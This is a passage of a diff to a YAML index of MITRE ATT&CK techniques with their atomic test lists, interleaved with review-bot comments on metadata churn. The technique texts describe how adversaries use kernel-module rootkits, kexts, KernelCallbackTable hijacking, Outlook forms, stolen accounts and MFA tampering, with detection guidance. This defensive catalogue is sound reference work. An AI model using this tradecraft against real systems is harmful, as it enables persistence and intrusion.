- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -32914,16 +33340,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -32964,7 +33389,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests:
- name: AWS - Create a group and add a user to that group
@@ -33002,138 +33426,137 @@ persistence:
name: sh
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests: []
T1574.013:
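Review bot: the `-` lines drop T1547.006's `description`, `x_mitre_detection`, `kill_chain_phases`, `x_mitre_data_sources`, `x_mitre_permissions_required`, `x_mitre_deprecated` and `revoked`, while this hunk only adds `url`, `object_marking_refs` and `x_mitre_attack_spec_version: 3.2.0`. If the generator re-emits those keys earlier in the object (as the T1137.003 and T1546.004 hunks further down do for their reordered keys) this is only key reordering, but nothing in this hunk restores them, so please confirm the regenerated T1547.006 entry still carries its description and detection text. The `- url:` / `+ url:` swap around every `source_name` is also pure key-order churn; emitting keys in a fixed order in the generator would keep future diffs down to the real changes.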
@@ -33170,7 +33593,7 @@ persistence:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
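Review bot: `modified` for KernelCallbackTable goes backwards, from 2022-05-11T14:00:00.188Z to 2022-03-22T15:47:33.915Z; ROMMONkit, IIS Components, Authentication Package and Component Object Model Hijacking show the same regression further down, and in each of those cases the entry also keeps or loses an old `x_mitre_attack_spec_version` instead of moving to 3.2.0. A regeneration from a single current STIX release should not move timestamps backwards, so please state in the PR description which bundle these objects came from (the shared 2022-05-11T14:00:00.188Z value looks like an earlier bulk re-stamp that the newer source no longer carries, which would make the regression legitimate, but that needs saying).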
@@ -33196,12 +33619,10 @@ persistence:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
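Review bot: `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed from KernelCallbackTable with no replacement, whereas the Systemd Timers hunk immediately below bumps its `x_mitre_attack_spec_version` to 3.2.0, so the regenerated KernelCallbackTable object ends up with no attack spec version at all (IIS Components and ROMMONkit later in this diff end up the same way). Either the upstream object is stale or the generator drops the key; a pre-merge check that every `technique:` block in the regenerated file has an `x_mitre_attack_spec_version` would catch this.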
@@ -33279,9 +33700,8 @@ persistence:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1542.004:
@@ -33308,7 +33728,7 @@ persistence:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -33330,41 +33750,10 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
- type: attack-pattern
- created: '2019-11-07T20:06:02.624Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.003
- url: https://attack.mitre.org/techniques/T1137/003
- - source_name: SensePost Outlook Forms
- url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
- description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
- February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:00.782Z'
name: Outlook Forms
description: |-
Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
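Review bot: the `-` lines for T1137.003 remove `id`, `type`, `created`, `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs` and all `external_references`, and the following hunk re-emits every one of them in a different order, so the net change for this entry is key order plus the `Office 365` to `Office Suite` platform rename; ROMMONkit at the top of the same hunk, by contrast, genuinely loses `spec_version` and `x_mitre_attack_spec_version: 2.1.0` with nothing added back. Reviewers would be helped by the PR description separating the reorder noise from the content changes, since the reorder hides the one-line ROMMONkit loss.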
@@ -33373,22 +33762,49 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+ created: '2019-11-07T20:06:02.624Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/003
+ external_id: T1137.003
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Forms
+ description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+ February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574:
technique:
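Review bot: `x_mitre_permissions_required` (`Administrator`, `User`) is removed from Outlook Forms and not re-added anywhere in this hunk, while `x_mitre_platforms` changes `Office 365` to `Office Suite` and `x_mitre_version` goes to 1.2. The platform rename matches the ATT&CK v16 consolidation of Office 365 and Google Workspace into "Office Suite" (and Azure AD into "Identity Provider"), which the T1078 and T1556.006 hunks below also show, so that part is expected; please confirm that dropping `x_mitre_permissions_required` is an upstream schema change rather than a key the generator silently lost, and note that any index file keyed on the retired platform names needs regenerating in the same change.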
@@ -33454,7 +33870,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -33528,11 +33943,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -33549,7 +33963,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -33559,7 +33972,7 @@ persistence:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
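Review bot: `Goldstein Menachem` becomes `Menachem Goldstein`, which reads as a correction of name order; the same contributor string may appear on other techniques in this file, so a grep for the old spelling before merge would keep contributor lists consistent across entries.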
@@ -33568,19 +33981,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
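Review bot: dropping `Azure AD`, `Office 365` and `Google Workspace` from T1078's `x_mitre_platforms` in favour of `Office Suite` and `Identity Provider` changes which per-platform index files this technique belongs to, so the index CSVs named after the retired platforms should be regenerated or retired in the same change to keep the YAML and the indexes in agreement. The removed `x_mitre_modified_by_ref` is re-added later in the object (`@@ -33628,11 +34039,12 @@`), so that line is only reordering.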
@@ -33628,11 +34039,12 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -33661,24 +34073,26 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -33713,9 +34127,6 @@ persistence:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1505.004:
technique:
@@ -33775,7 +34186,7 @@ persistence:
description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
on Targets in the Middle East. Retrieved July 6, 2018.
source_name: Unit 42 RGDoor Jan 2018
